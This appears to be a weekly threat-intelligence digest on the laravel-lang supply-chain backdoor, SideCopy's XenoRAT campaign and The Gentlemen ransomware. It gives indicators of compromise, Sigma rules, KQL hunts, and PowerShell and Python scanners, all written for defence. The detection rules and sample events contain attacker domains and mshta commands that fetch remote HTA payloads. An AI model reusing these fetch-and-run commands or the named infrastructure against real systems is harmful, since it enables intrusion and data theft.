This week's OTX pulses highlight a diverse and aggressive threat landscape, ranging from a software supply chain compromise to nation-state espionage and the expansion of ransomware-as-a-service (RaaS). Backdoored laravel-lang packages, spanning hundreds of package versions, give the attackers remote code execution (RCE) on developer machines and steal data from them. Geopolitically, the SideCopy APT group (linked to Transparent Tribe) is intensifying campaigns against Afghanistan's Ministry of Finance, using Pashto-language lures to deploy XenoRAT. Simultaneously, financially motivated actors are advancing The Gentlemen RaaS operation (Storm-2697), which uses self-propagating Go-based encryptors against critical infrastructure sectors.
Threat Actor / Malware Profile
Laravel Lang Compromise (Supply Chain)
- Distribution: Malicious packages pushed to official repositories via compromised developer credentials, specifically targeting `laravel-lang` dependencies.
- Payload Behavior: Delivers `helpers.php` (stealer) and `DebugChromium.exe`. Establishes RCE allowing arbitrary command execution on the victim host.
- C2 Communication: Connects to `flipboxstudio.info` for payload retrieval and exfiltration.
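A practitioner triaging a Laravel project after this pulse wants to know two things quickly: which laravel-lang packages are installed (and at what version), and whether any vendored file carries the published indicators. The script below is an added example, not code from the original digest or from the Laravel Lang project. It assumes the standard Composer layout (packages recorded in `composer.lock` and installed under `vendor/laravel-lang/<package>/`) and uses only the two indicator strings named above; the demo project it builds in a temporary directory is constructed, not a real sample.

```python
"""Scan a Laravel project for artifacts of the laravel-lang package compromise.

Added example, not code from the original digest or from the Laravel Lang
project. Assumptions: Composer installs the packages under
vendor/laravel-lang/<package>/ and records them in composer.lock; the indicator
strings are the ones the digest names (C2 domain and dropped payload name).
The demo project built by run_demo() is constructed, not a real sample.
"""
import json
import re
import tempfile
from pathlib import Path

C2_DOMAIN = "flipboxstudio.info"      # C2/exfil node named in the digest
PAYLOAD_NAME = "DebugChromium.exe"    # dropped stealer named in the digest
VENDOR_PREFIX = "laravel-lang/"       # Composer vendor namespace of the packages (assumption)

IOC_PATTERNS = {
    "c2-domain": re.compile(re.escape(C2_DOMAIN), re.IGNORECASE),
    "payload-name": re.compile(re.escape(PAYLOAD_NAME), re.IGNORECASE),
}


def installed_laravel_lang_packages(lock_path):
    """Return {name: version} for every laravel-lang/* entry in composer.lock."""
    lock = json.loads(Path(lock_path).read_text(encoding="utf-8"))
    found = {}
    for section in ("packages", "packages-dev"):
        for pkg in lock.get(section, []):
            name = pkg.get("name", "")
            if name.startswith(VENDOR_PREFIX):
                found[name] = pkg.get("version", "unknown")
    return found


def scan_vendor(project_root):
    """Report files under vendor/laravel-lang carrying the IOC strings.

    Returns sorted (posix_relative_path, indicator) tuples. A file named
    helpers.php is reported under indicator 'helpers.php' for manual review,
    because the digest names that file as the stealer but does not publish
    its contents; 'c2-domain' and 'payload-name' are the high-confidence hits.
    """
    root = Path(project_root)
    vendor = root / "vendor" / "laravel-lang"
    findings = []
    if not vendor.is_dir():
        return findings
    for path in vendor.rglob("*"):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        if path.name.lower() == "helpers.php":
            findings.append((rel, "helpers.php"))
        text = path.read_text(encoding="utf-8", errors="replace")
        for label, pattern in IOC_PATTERNS.items():
            if pattern.search(text):
                findings.append((rel, label))
    return sorted(findings)


def run_demo():
    """Build a constructed project tree in a temp dir, scan it, return results."""
    root = Path(tempfile.mkdtemp(prefix="laravel-lang-scan-"))
    lock = {"packages": [{"name": "laravel-lang/lang", "version": "0.0.0-constructed"},
                         {"name": "laravel/framework", "version": "0.0.0-constructed"}],
            "packages-dev": []}
    (root / "composer.lock").write_text(json.dumps(lock), encoding="utf-8")
    src = root / "vendor" / "laravel-lang" / "lang" / "src"
    src.mkdir(parents=True)
    # Constructed stand-in for the backdoored helper: only the C2 string matters here.
    (src / "helpers.php").write_text("<?php\n$c2 = 'flipboxstudio.info';\n", encoding="utf-8")
    (src / "clean.php").write_text("<?php\nreturn ['hello' => 'salam'];\n", encoding="utf-8")
    return {
        "root": root,
        "packages": installed_laravel_lang_packages(root / "composer.lock"),
        "findings": scan_vendor(root),
    }


if __name__ == "__main__":
    result = run_demo()
    print("laravel-lang packages:", result["packages"])
    for rel, indicator in result["findings"]:
        print(f"[!] {indicator:13s} {rel}")
```

Point `scan_vendor()` and `installed_laravel_lang_packages()` at a real project root instead of the demo tree. A hit on `c2-domain` or `payload-name` is a confirmed artifact; a bare `helpers.php` hit only means the file exists and should be diffed against a known-good release of the same package version.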
SideCopy (APT36 / Transparent Tribe)
- Distribution: Spear-phishing emails containing weaponized LNK files disguised as staff directories. Uses Pashto-language themes to target Afghan government entities.
- Payload Behavior: Multi-stage loader. The LNK launches `mshta.exe` to fetch a remote HTA payload from compromised Afghan education infrastructure (`abimj.edu.af`), which deploys XenoRAT.
- Persistence: Likely via registry run keys or scheduled tasks established by the HTA payload.
The Gentlemen (Storm-2697)
- Distribution: Aggressive self-propagation mechanisms across networks (likely exploiting SMB/RDP or removable media).
- Payload Behavior: Go-language ransomware using Curve25519 for key exchange and XChaCha20 for stream encryption. Designed for broad, automated compromise.
- RaaS Model: Operates as a service, recruiting affiliates via dark web forums (BreachForums).
IOC Analysis
The provided indicators span infrastructure, file hashes and network artifacts critical for detection:
- Domains & URLs: `flipboxstudio.info` serves as the C2/exfiltration node for the Laravel campaign. `abimj.edu.af` is a compromised domain acting as a download server for SideCopy payloads. SOC teams should block these domains at the proxy/DNS level and hunt historical DNS and proxy logs for requests to them.
- IP Addresses: `103.132.98.224` is associated with the SideCopy C2 infrastructure. Hunt for prior connections before blocking it on perimeter firewalls, so that already-compromised hosts are not hidden by the block.
- File Hashes: Multiple SHA256, MD5 and SHA1 hashes are provided for the XenoRAT payload, The Gentlemen encryptor and the stealer components (`DebugChromium.exe`). Load these into EDR blocklists and run retrospective scans.
Tooling: Sigma rules cover the process behaviours described above. File hashes belong in EDR and SIEM match lists rather than in YARA rules: a hash-only YARA rule can match a whole file on disk but is useless for memory scanning, where the sample has already been unpacked, so YARA rules for memory should be built from strings and byte patterns extracted from the samples. SIEMs (Splunk, Sentinel) should correlate network connections to the listed domains with process creation events.
Detection Engineering
```yaml
---
title: Potential Laravel Lang Compromise - DebugChromium Execution
id: 91a3b4c5-d6e7-4f8a-9a0b-1c2d3e4f5a6b
status: experimental
description: Detects execution of DebugChromium.exe, a known payload from the compromised Laravel Lang packages.
references:
    - https://socket.dev/blog/laravel-lang-compromise
author: Security Arsenal
date: 2026-05-31
modified: 2026-05-31
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\DebugChromium.exe'
    condition: selection
falsepositives:
    - Legitimate Chromium debug instances (rare)
level: high
```
```yaml
---
title: SideCopy APT - Mshta.exe Suspicious Execution
id: a1b2c3d4-e5f6-4a5b-8c9d-0e1f2a3b4c5d
status: experimental
description: Detects mshta.exe launched from a scripting or Office host, or passed a remote HTA location, as seen in SideCopy initial access where an LNK spawns mshta.exe to fetch an HTA from compromised .edu.af infrastructure. Destination hostnames are not present in process_creation events, so the domain is matched on the command line; pair with a network_connection rule for hostname-based matching.
references:
    - https://www.seqrite.com/blog/operation-xenofiscal-sidecopy-deploying-persistent-xenorat-targeting-the-mof-afghanistan/
author: Security Arsenal
date: 2026-05-31
modified: 2026-05-31
tags:
    - attack.defense-evasion
    - attack.t1218.005
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        Image|endswith: '\mshta.exe'
    selection_parent:
        ParentImage|endswith:
            - '\winword.exe'
            - '\excel.exe'
            - '\powershell.exe'
            - '\cmd.exe'
    selection_remote:
        CommandLine|contains:
            - 'http://'
            - 'https://'
            - '.edu.af'
    # mshta.exe must always match. '1 of selection*' would fire on every
    # child of cmd.exe or powershell.exe, not just on mshta.exe.
    condition: selection_img and (selection_parent or selection_remote)
falsepositives:
    - Administrative troubleshooting
level: high
```
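The condition of the mshta rule is the part most likely to be got wrong, so it is worth seeing the two variants run over concrete events. The script below is an added example, not code from the digest or from any Sigma backend: it re-implements the rule's three selections in plain Python (the third selection is modelled as command-line matching, since process-creation telemetry has no destination hostname) and compares the corrected condition against `1 of selection*`. The four events are constructed samples, not real telemetry.

```python
"""Evaluate the SideCopy mshta.exe Sigma logic over constructed process events.

Added example, not code from the original digest or from any Sigma tooling.
It re-implements the rule's selections in plain Python to show why the
condition must be 'selection_img and (selection_parent or selection_remote)'
rather than '1 of selection*': the latter fires on any child of cmd.exe.
The events below are constructed samples, not real telemetry.
"""
from dataclasses import dataclass

PARENT_SUFFIXES = ("\\winword.exe", "\\excel.exe", "\\powershell.exe", "\\cmd.exe")
REMOTE_MARKERS = ("http://", "https://", ".edu.af")


@dataclass(frozen=True)
class ProcessEvent:
    image: str
    parent_image: str
    command_line: str


def selection_img(ev: ProcessEvent) -> bool:
    """Image|endswith: '\\mshta.exe' (case-insensitive, as most backends compile it)."""
    return ev.image.lower().endswith("\\mshta.exe")


def selection_parent(ev: ProcessEvent) -> bool:
    """ParentImage|endswith one of the scripting/Office hosts."""
    return ev.parent_image.lower().endswith(PARENT_SUFFIXES)


def selection_remote(ev: ProcessEvent) -> bool:
    """CommandLine|contains a URL scheme or the compromised .edu.af domain."""
    cl = ev.command_line.lower()
    return any(marker in cl for marker in REMOTE_MARKERS)


def condition_original(ev: ProcessEvent) -> bool:
    """The first draft's '1 of selection*': any single selection is enough."""
    return selection_img(ev) or selection_parent(ev) or selection_remote(ev)


def condition_fixed(ev: ProcessEvent) -> bool:
    """Corrected: the mshta image is mandatory, plus one corroborating signal."""
    return selection_img(ev) and (selection_parent(ev) or selection_remote(ev))


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = {
    "lnk_to_cmd_to_mshta_remote": ProcessEvent(
        r"C:\Windows\System32\mshta.exe", r"C:\Windows\System32\cmd.exe",
        r"mshta.exe http://abimj.edu.af/staff/directory.hta"),
    "explorer_to_mshta_remote": ProcessEvent(
        r"C:\Windows\System32\mshta.exe", r"C:\Windows\explorer.exe",
        r"mshta.exe https://abimj.edu.af/update.hta"),
    "benign_child_of_cmd": ProcessEvent(
        r"C:\Windows\System32\notepad.exe", r"C:\Windows\System32\cmd.exe",
        r"notepad.exe notes.txt"),
    "mshta_local_hta_from_explorer": ProcessEvent(
        r"C:\Windows\System32\mshta.exe", r"C:\Windows\explorer.exe",
        r'mshta.exe "C:\Program Files\Vendor\setup.hta"'),
}


def triage(events=SAMPLE_EVENTS):
    """Return {name: (original_fires, fixed_fires)} for each event."""
    return {name: (condition_original(ev), condition_fixed(ev))
            for name, ev in events.items()}


if __name__ == "__main__":
    for name, (orig, fixed) in triage().items():
        print(f"{name:32s} original={orig!s:5s} fixed={fixed}")
```

The benign `notepad.exe` child of `cmd.exe` fires under `1 of selection*` and not under the corrected condition; the mshta launch directly from `explorer.exe` with a remote URL (the LNK double-click path) still fires under the corrected rule through `selection_remote`. The last event, a local HTA launched from `explorer.exe`, is the gap that remains: it only matches the loose rule, and catching it without the noise of every local HTA needs a separate, narrower rule.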
```yaml
---
title: The Gentlemen Ransomware - Known Encryptor Hash Executed
id: b2c3d4e5-f6a7-4b5c-9d0e-1f2a3b4c5d6e
status: experimental
description: Detects execution of binaries matching the SHA256 hashes published for The Gentlemen Go-based, self-propagating encryptor. Exact-hash matching only catches the sampled builds; pair it with EDR behavioural ransomware detections for affiliate rebuilds. A generic "unsigned executable" rule, as first drafted here, is not usable at scale.
references:
    - https://www.microsoft.com/en-us/security/blog/2026/05/28/the-gentlemen-ransomware-dissecting-a-self-propagating-go-encryptor/
author: Security Arsenal
date: 2026-05-31
modified: 2026-05-31
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Hashes|contains:
            - 'SHA256=22b38dad7da097ea03aa28d0614164cd25fafeb1383dbc15047e34c8050f6f67'
            - 'SHA256=fe1033335a045c696c900d435119d210361966e2fb5cd1ba3382608cfa2c8e68'
    condition: selection
falsepositives:
    - None expected for exact hash matches
level: high
```
Each of the following queries runs on its own in Advanced Hunting.

```kql
// Hunt for Laravel C2 and SideCopy infrastructure in network telemetry.
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl has_any ("flipboxstudio.info", "abimj.edu.af")
    or RemoteIP == "103.132.98.224"
| project Timestamp, DeviceName, InitiatingProcessFileName, InitiatingProcessCommandLine, RemoteUrl, RemoteIP
```

```kql
// Hunt for SideCopy initial access: mshta.exe launched from a scripting/Office host
// or passed a remote HTA. Process names are compared case-insensitively (=~, in~).
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName =~ "mshta.exe"
| where InitiatingProcessFileName in~ ("winword.exe", "excel.exe", "cmd.exe", "powershell.exe")
    or ProcessCommandLine has_any ("http://", "https://", ".edu.af")
| project Timestamp, DeviceName, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine
```

```kql
// Hunt for The Gentlemen ransomware hashes. DeviceFileEvents only carries SHA256 for
// some file actions, so process executions are checked as well.
let GentlemenHashes = dynamic([
    "22b38dad7da097ea03aa28d0614164cd25fafeb1383dbc15047e34c8050f6f67",
    "fe1033335a045c696c900d435119d210361966e2fb5cd1ba3382608cfa2c8e68"
]);
union
    (DeviceFileEvents
     | where Timestamp > ago(7d)
     | where SHA256 in (GentlemenHashes)
     | project Timestamp, DeviceName, FileName, FolderPath, SHA256),
    (DeviceProcessEvents
     | where Timestamp > ago(7d)
     | where SHA256 in (GentlemenHashes)
     | project Timestamp, DeviceName, FileName, FolderPath, SHA256)
```
```powershell
# IOC Hunt Script for The Gentlemen and Laravel Malware
# The pulse lists both MD5 (32 hex chars) and SHA256 (64 hex chars) values, so the
# list is split by length and each file is compared with the matching algorithm.
# The original draft hashed every file with SHA256 only, so the MD5 indicators
# could never match.
$TargetHashes = @(
    "22b38dad7da097ea03aa28d0614164cd25fafeb1383dbc15047e34c8050f6f67",
    "fe1033335a045c696c900d435119d210361966e2fb5cd1ba3382608cfa2c8e68",
    "7a262d4cbbc4808932b6af42c4041f06",
    "3b4194bdfe40d94031a94b30397ffd8a4b09d0a4057668e897b8bdcd1703dd01",
    "99127c8c67d90e2776beeb85281f9c68399bf4567b07a6b638d68b760212e88d",
    "0b937b7da4602a8aa5346681b13a3466",
    "14ce728a416b1f13e8645f3f7b860a37"
)
$Sha256Targets = @($TargetHashes | Where-Object { $_.Length -eq 64 })
$Md5Targets    = @($TargetHashes | Where-Object { $_.Length -eq 32 })

# Hashing every file on every drive is slow; narrow -Path to user profiles and
# temp directories when triaging many hosts.
Write-Host "[+] Scanning for malicious file hashes..." -ForegroundColor Cyan
$Drives = Get-PSDrive -PSProvider FileSystem | Select-Object -ExpandProperty Root
foreach ($Drive in $Drives) {
    Write-Host "Scanning $Drive..." -ForegroundColor Yellow
    Get-ChildItem -Path $Drive -File -Recurse -Force -ErrorAction SilentlyContinue |
    ForEach-Object {
        $File = $_
        $Sha = Get-FileHash -LiteralPath $File.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue
        if ($Sha -and $Sha.Hash -in $Sha256Targets) {
            Write-Host "[!] MALICIOUS FILE FOUND (SHA256): $($File.FullName) | $($Sha.Hash)" -ForegroundColor Red
            return   # skip the MD5 pass for a file already matched
        }
        $Md5 = Get-FileHash -LiteralPath $File.FullName -Algorithm MD5 -ErrorAction SilentlyContinue
        if ($Md5 -and $Md5.Hash -in $Md5Targets) {
            Write-Host "[!] MALICIOUS FILE FOUND (MD5): $($File.FullName) | $($Md5.Hash)" -ForegroundColor Red
        }
    }
}

# Resolve the wildcard so the real path, not the pattern, is reported.
Write-Host "[+] Checking for Laravel Compromise Artifacts (DebugChromium.exe)..." -ForegroundColor Cyan
$LaravelHits = Get-ChildItem -Path "C:\Users\*\AppData\Roaming\DebugChromium.exe" -Force -ErrorAction SilentlyContinue
foreach ($Hit in $LaravelHits) {
    Write-Host "[!] Laravel Malware Detected at $($Hit.FullName)" -ForegroundColor Red
}
```
Response Priorities
- Immediate:
  - Block the listed domains (`flipboxstudio.info`, `abimj.edu.af`) and IP address (`103.132.98.224`) at the network perimeter and on internal DNS resolvers.
  - Run the PowerShell script or EDR hash scans across all endpoints to identify the malware files.
  - Isolate any device showing communication to the Laravel C2 or SideCopy infrastructure.
- 24 Hours:
  - Audit developer accounts with publish access to `laravel-lang` repositories and packages; rotate API tokens, registry publishing tokens and SSH keys immediately.
  - For organisations in the targeted sector (government finance ministries), investigate for signs of lateral movement consistent with XenoRAT.
- 1 Week:
  - Pin dependencies through `composer.lock`, verify package integrity on install, and maintain an SBOM so affected package versions can be identified quickly when an advisory lands.
  - Review and patch SMB/RDP exposure to close the self-propagation vectors attributed to The Gentlemen ransomware.
  - Hunt for unpatched or exposed systems that RaaS tooling could use for propagation.